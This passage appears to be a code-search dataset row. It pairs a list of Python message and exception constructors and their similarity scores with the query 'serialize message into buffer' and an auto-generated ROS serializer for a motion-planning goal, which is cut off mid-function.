self.customMessage = customMessage", "def __init__(self,msg) -> None:\n\n super().__init__(self)\n self.msg=msg", "def __init__(self, msg=\"\"):\n self._msg = msg\n super().__init__()", "def __init__(self, message):\n super().__init__(message)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(VescCtrlStamped, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.control is None:\n self.control = vesc_msgs.msg.VescCtrl()\n else:\n self.header = std_msgs.msg.Header()\n self.control = vesc_msgs.msg.VescCtrl()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(pid_control_reqResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.FL_vel is None:\n self.FL_vel = 0\n if self.FR_vel is None:\n self.FR_vel = 0\n if self.BL_vel is None:\n self.BL_vel = 0\n if self.BR_vel is None:\n self.BR_vel = 0\n else:\n self.FL_vel = 0\n self.FR_vel = 0\n self.BL_vel = 0\n self.BR_vel = 0", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(pid_control_reqRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.yaw is None:\n self.yaw = 0.\n else:\n self.yaw = 0.", "def __init__(\n self,\n code: typing.Optional[int] = None,\n message: typing.Optional[str] = None,\n ) -> None:\n super().__init__()\n self.code = code\n self.message = message", "def __init__(\n self,\n code: typing.Optional[int] = None,\n message: typing.Optional[str] = None,\n ) -> None:\n super().__init__()\n self.code = code\n self.message = message", "def __init__(self, message=\"\"):\n\n self._message = message\n self._startTime = time.time()", "def __init__(self, msg: str):\n self.msg = msg", "def __init__(self, message: str, value, expected):\n super().__init__(message, value, expected)\n self.message = message\n self.value = value\n self.expected = expected", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ConductorGraph, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.pending is None:\n self.pending = []\n if self.available is None:\n self.available = []\n if self.missing is None:\n self.missing = []\n if self.gone is None:\n self.gone = []\n else:\n self.pending = []\n self.available = []\n self.missing = []\n self.gone = []", "def __init__(self, msg):\n\n self.msg = msg", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(CoachInfo, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.MatchMode is None:\n self.MatchMode = 0\n if self.MatchType is None:\n self.MatchType = 0\n if self.TestMode is None:\n self.TestMode = 0\n if self.pointA is None:\n self.pointA = nubot_common.msg.Point2d()\n if self.pointB is None:\n self.pointB = nubot_common.msg.Point2d()\n if self.angleA is None:\n self.angleA = 0\n if self.angleB is None:\n self.angleB = 0\n if self.idA is None:\n self.idA = 0\n if self.idB is None:\n self.idB = 0\n if self.kickforce is None:\n self.kickforce = 0\n else:\n self.header = std_msgs.msg.Header()\n self.MatchMode = 0\n self.MatchType = 0\n self.TestMode = 0\n self.pointA = nubot_common.msg.Point2d()\n self.pointB = nubot_common.msg.Point2d()\n self.angleA = 0\n self.angleB = 0\n self.idA = 0\n self.idB = 0\n self.kickforce = 0", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(Actors, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.actors is None:\n self.actors = []\n else:\n self.header = std_msgs.msg.Header()\n self.actors = []", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(InitialSceneResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.tsp_turtles is None:\n self.tsp_turtles = ''\n if self.conveyor_turtle is None:\n self.conveyor_turtle = ''\n if self.catch_turtle is None:\n self.catch_turtle = ''\n else:\n self.tsp_turtles = ''\n self.conveyor_turtle = ''\n self.catch_turtle = ''", "def __init__(self, *args):\n\n super(GoveeException, self).__init__()\n\n if args:\n self.message = args[0]\n else:\n self.message = None", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(FilterStepInfo, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.step_num is None:\n self.step_num = 0\n if self.info_type is None:\n self.info_type = 0\n if self.predict is None:\n self.predict = argus_msgs.msg.FilterPredictStep()\n if self.update is None:\n self.update = argus_msgs.msg.FilterUpdateStep()\n else:\n self.header = std_msgs.msg.Header()\n self.step_num = 0\n self.info_type = 0\n self.predict = argus_msgs.msg.FilterPredictStep()\n self.update = argus_msgs.msg.FilterUpdateStep()", "def __init__(self, peer, text, direction, status=None, timestamp=None, **kargs):\n super(Message, self).__init__()\n storage = None\n\n self.peer = TelNumber.as_type(peer)\n self.text = Text.as_type(text)\n self.timestamp = Time.as_type(timestamp)\n # TODO: use a boolean here\n assert direction in ['in', 'out'], direction\n self.direction = direction\n self.status = status or direction == 'out' and 'read' or 'unread'\n assert self.status in ['read', 'unread', 'unsent', 'sent'], status", "def __init__(__self__, *,\n code: Optional[pulumi.Input[str]] = None,\n message: Optional[pulumi.Input[str]] = None):\n if code is not None:\n pulumi.set(__self__, \"code\", code)\n if message is not None:\n pulumi.set(__self__, \"message\", message)", "def __init__(self):\n\n # universal message variables\n self.text = None\n self.files = []\n self.keywords = []\n self.performers = []\n self.hasPerformers = False # used to flag files from performer folders\n ## message only variables\n self.price = None # $3 - $100\n self.users = [] # users to send to\n ## post only variables\n self.expiration = None\n self.poll = None\n self.schedule = None\n ##\n self.gotten = False", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(DahuaQrcodeScanData, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.Header is None:\n self.Header = std_msgs.msg.Header()\n if self.x_pos is None:\n self.x_pos = 0\n if self.y_pos is None:\n self.y_pos = 0\n if self.angle is None:\n self.angle = 0\n if self.code_type is None:\n self.code_type = 0\n if self.code_num is None:\n self.code_num = 0\n else:\n self.Header = std_msgs.msg.Header()\n self.x_pos = 0\n self.y_pos = 0\n self.angle = 0\n self.code_type = 0\n self.code_num = 0", "def testValidate_Optional(self):\n class SimpleMessage(messages.Message):\n non_required = messages.IntegerField(1)\n\n simple_message = SimpleMessage()\n simple_message.check_initialized()\n simple_message.non_required = 10\n simple_message.check_initialized()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GetPlanningSceneRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.planning_scene_diff is None:\n self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()\n if self.operations is None:\n self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()\n else:\n self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()\n self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()", "def __init__(self, message=None, details=None, **kw):\n if not message:\n message = self.defaultMessage\n\n self.message = message\n self.details = details\n self.traceback = traceback.format_exc()", "def __init__(self, message):\n self.vars = {}\n self.vars['message'] = message", "def __init__(self, data, attributes=None, *args, **kwargs):\n\n super(PublisherMessage, self).__init__(*args, **kwargs)\n\n self.data = data\n self.attributes = attributes or {}", "def __init__(self, msg: str) -> None:\n ...", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(FeedbackMsg, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.name is None:\n self.name = []\n if self.position is None:\n self.position = []\n if self.velocity is None:\n self.velocity = []\n if self.effort is None:\n self.effort = []\n if self.position_command is None:\n self.position_command = []\n if self.velocity_command is None:\n self.velocity_command = []\n if self.effort_command is None:\n self.effort_command = []\n if self.accelerometer is None:\n self.accelerometer = []\n if self.gyro is None:\n self.gyro = []\n if self.orientation is None:\n self.orientation = []\n if self.deflection is None:\n self.deflection = []\n if self.deflection_velocity is None:\n self.deflection_velocity = []\n if self.motor_velocity is None:\n self.motor_velocity = []\n if self.motor_current is None:\n self.motor_current = []\n if self.motor_winding_current is None:\n self.motor_winding_current = []\n if self.motor_sensor_temperature is None:\n self.motor_sensor_temperature = []\n if self.motor_winding_temperature is None:\n self.motor_winding_temperature = []\n if self.motor_housing_temperature is None:\n self.motor_housing_temperature = []\n if self.board_temperature is None:\n self.board_temperature = []\n if self.processor_temperature is None:\n self.processor_temperature = []\n if self.voltage is None:\n self.voltage = []\n if self.led_color is None:\n self.led_color = []\n if self.sequence_number is None:\n self.sequence_number = []\n if self.receive_time is None:\n self.receive_time = []\n if self.transmit_time is None:\n self.transmit_time = []\n if self.hardware_receive_time is None:\n self.hardware_receive_time = []\n if self.hardware_transmit_time is None:\n self.hardware_transmit_time = []\n else:\n self.name = []\n self.position = []\n self.velocity = []\n self.effort = []\n self.position_command = []\n self.velocity_command = []\n self.effort_command = []\n self.accelerometer = []\n self.gyro = []\n self.orientation = []\n self.deflection = []\n self.deflection_velocity = []\n self.motor_velocity = []\n self.motor_current = []\n self.motor_winding_current = []\n self.motor_sensor_temperature = []\n self.motor_winding_temperature = []\n self.motor_housing_temperature = []\n self.board_temperature = []\n self.processor_temperature = []\n self.voltage = []\n self.led_color = []\n self.sequence_number = []\n self.receive_time = []\n self.transmit_time = []\n self.hardware_receive_time = []\n self.hardware_transmit_time = []", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GraspConfig, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n else:\n self.position = geometry_msgs.msg.Point()\n self.approach = geometry_msgs.msg.Vector3()\n self.binormal = geometry_msgs.msg.Vector3()\n self.axis = geometry_msgs.msg.Vector3()\n self.width = std_msgs.msg.Float32()\n self.score = std_msgs.msg.Float32()\n self.sample = geometry_msgs.msg.Point()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(sslDebug_Data, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.id is None:\n self.id = ''\n if self.line is None:\n self.line = []\n if self.circle is None:\n self.circle = []\n else:\n self.id = ''\n self.line = []\n self.circle = []", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(InitialSceneRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.numberOfTSPTurtles is None:\n self.numberOfTSPTurtles = 0\n else:\n self.numberOfTSPTurtles = 0", "def __init__(self, msg, final=False):\n self.__msg = msg\n self.final = final", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(EncounterV, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.cnt is None:\n self.cnt = []\n else:\n self.cnt = []", "def __init__(self, message_type: LogType, message: str):\n self.timestamp = datetime.datetime.now().strftime(\"%m-%d-%Y %I:%M:%S %p\")\n self.message = message\n self.message_type = message_type", "def __init__(self):\n self.type = None\n self.msg = \"\"\n self.process = None\n self.edge_id = None", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(RotationMatrix, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.c0 is None:\n self.c0 = bh_motion.msg.Vector3()\n if self.c1 is None:\n self.c1 = bh_motion.msg.Vector3()\n if self.c2 is None:\n self.c2 = bh_motion.msg.Vector3()\n else:\n self.c0 = bh_motion.msg.Vector3()\n self.c1 = bh_motion.msg.Vector3()\n self.c2 = bh_motion.msg.Vector3()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(WorldModelInfo, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.obstacleinfo is None:\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n if self.oppinfo is None:\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n if self.robotinfo is None:\n self.robotinfo = []\n if self.ballinfo is None:\n self.ballinfo = []\n if self.coachinfo is None:\n self.coachinfo = nubot_common.msg.CoachInfo()\n if self.pass_cmd is None:\n self.pass_cmd = nubot_common.msg.PassCommands()\n else:\n self.header = std_msgs.msg.Header()\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n self.robotinfo = []\n self.ballinfo = []\n self.coachinfo = nubot_common.msg.CoachInfo()\n self.pass_cmd = nubot_common.msg.PassCommands()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GetPlanningSceneResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.planning_scene is None:\n self.planning_scene = arm_navigation_msgs.msg.PlanningScene()\n else:\n self.planning_scene = arm_navigation_msgs.msg.PlanningScene()", "def __init__(self, message: str) -> None:\n\n self.message = message if message[-1] == '.' else message + '.'", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(MPC_ACCResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.i is None:\n self.i = 0.\n else:\n self.i = 0.", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(VideoImage, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.unique_key is None:\n self.unique_key = 0\n if self.gps_week is None:\n self.gps_week = 0\n if self.gps_millisecond is None:\n self.gps_millisecond = 0\n if self.video_id is None:\n self.video_id = 0\n if self.image is None:\n self.image = autonavigation.msg.Image()\n else:\n self.unique_key = 0\n self.gps_week = 0\n self.gps_millisecond = 0\n self.video_id = 0\n self.image = autonavigation.msg.Image()", "def __init__(self, message, *args, **kwargs):\n Job.Service.__init__(self, *args, **kwargs)\n self.message = message" ]
[ "0.77939296", "0.7720264", "0.7720264", "0.76866186", "0.7626193", "0.756387", "0.74395823", "0.7416946", "0.7308225", "0.72806025", "0.72379386", "0.72272825", "0.7224187", "0.7224187", "0.7218873", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.72090733", "0.7202682", "0.7202682", "0.7202682", "0.7200424", "0.71962625", "0.7187075", "0.71858245", "0.7139403", "0.71326554", "0.71310747", "0.71310747", "0.71310747", "0.71298164", "0.7127749", "0.7115115", "0.7110097", "0.7060733", "0.70520115", "0.70310014", "0.6974384", "0.6969823", "0.6953688", "0.6949925", "0.6924152", "0.6898258", "0.6898258", "0.68979895", "0.6878055", "0.68626255", "0.68594253", "0.6841009", "0.6802866", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6772085", "0.6763147", "0.67316407", "0.6728909", "0.67178714", "0.67095923", "0.6702592", "0.66978854", "0.668233", "0.6656379", "0.66559416", "0.66460854", "0.66215485", "0.6617578", "0.6607757", "0.66045326", "0.6603453", "0.6593575", "0.65652853", "0.6548455", "0.652192", "0.65206784", "0.65172404", "0.6508703", "0.649992", "0.6496085", "0.6477479", "0.64659375", "0.6447227", "0.64287496" ]
0.73519075
8
serialize message into buffer
def serialize(self, buff): try: _x = self buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_2I().pack(_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs)) _x = self.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs)) _x = self.goal.request.workspace_parameters.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_6d3I().pack(_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.request.start_state.joint_state.position)) length = len(self.goal.request.start_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.request.start_state.joint_state.velocity)) length = len(self.goal.request.start_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *self.goal.request.start_state.joint_state.effort)) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.transforms: _v1 = val1.translation _x = _v1 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v2 = val1.rotation _x = _v2 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.request.start_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.twist: _v3 = val1.linear _x = _v3 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v4 = val1.angular _x = _v4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.wrench: _v5 = val1.force _x = _v5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v6 = val1.torque _x = _v6 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v7 = val1.object _v8 = _v7.header buff.write(_get_struct_I().pack(_v8.seq)) _v9 = _v8.stamp _x = _v9 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v8.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v7.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v10 = _v7.type _x = _v10.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v10.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v7.primitives) buff.write(_struct_I.pack(length)) for val3 in _v7.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.dimensions)) length = len(_v7.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.primitive_poses: _v11 = val3.position _x = _v11 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v12 = val3.orientation _x = _v12 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v7.meshes) buff.write(_struct_I.pack(length)) for val3 in _v7.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(_get_struct_3I().pack(*val4.vertex_indices)) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v7.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.mesh_poses: _v13 = val3.position _x = _v13 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v14 = val3.orientation _x = _v14 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v7.planes) buff.write(_struct_I.pack(length)) for val3 in _v7.planes: buff.write(_get_struct_4d().pack(*val3.coef)) length = len(_v7.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.plane_poses: _v15 = val3.position _x = _v15 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v16 = val3.orientation _x = _v16 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v7.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v7.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v7.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v7.subframe_poses: _v17 = val3.position _x = _v17 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v18 = val3.orientation _x = _v18 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v7.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v19 = val1.detach_posture _v20 = _v19.header buff.write(_get_struct_I().pack(_v20.seq)) _v21 = _v20.stamp _x = _v21 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v20.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v19.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v19.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v19.points) buff.write(_struct_I.pack(length)) for val3 in _v19.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.positions)) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.velocities)) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.accelerations)) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val3.effort)) _v22 = val3.time_from_start _x = _v22 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.request.start_state.is_diff)) length = len(self.goal.request.goal_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.goal_constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v23 = val2.header buff.write(_get_struct_I().pack(_v23.seq)) _v24 = _v23.stamp _x = _v24 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v23.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v25 = val2.target_point_offset _x = _v25 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v26 = val2.constraint_region length = len(_v26.primitives) buff.write(_struct_I.pack(length)) for val4 in _v26.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(struct.pack(pattern, *val4.dimensions)) length = len(_v26.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v26.primitive_poses: _v27 = val4.position _x = _v27 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v28 = val4.orientation _x = _v28 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v26.meshes) buff.write(_struct_I.pack(length)) for val4 in _v26.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(_get_struct_3I().pack(*val5.vertex_indices)) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v26.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v26.mesh_poses: _v29 = val4.position _x = _v29 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v30 = val4.orientation _x = _v30 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v31 = val2.header buff.write(_get_struct_I().pack(_v31.seq)) _v32 = _v31.stamp _x = _v32 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v31.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v33 = val2.orientation _x = _v33 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v34 = val2.target_pose _v35 = _v34.header buff.write(_get_struct_I().pack(_v35.seq)) _v36 = _v35.stamp _x = _v36 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v35.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v37 = _v34.pose _v38 = _v37.position _x = _v38 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v39 = _v37.orientation _x = _v39 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v40 = val2.sensor_pose _v41 = _v40.header buff.write(_get_struct_I().pack(_v41.seq)) _v42 = _v41.stamp _x = _v42 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v41.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v43 = _v40.pose _v44 = _v43.position _x = _v44 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v45 = _v43.orientation _x = _v45 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 